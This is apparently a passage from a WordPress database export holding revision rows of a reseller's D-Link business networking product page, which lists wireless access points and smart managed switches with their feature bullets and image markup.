Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:11:29','2019-09-25 04:11:29','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3357,1,'2019-09-25 12:27:50','2019-09-25 04:27:50','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:27:50','2019-09-25 04:27:50','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3358,1,'2019-09-25 12:28:32','2019-09-25 04:28:32','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central 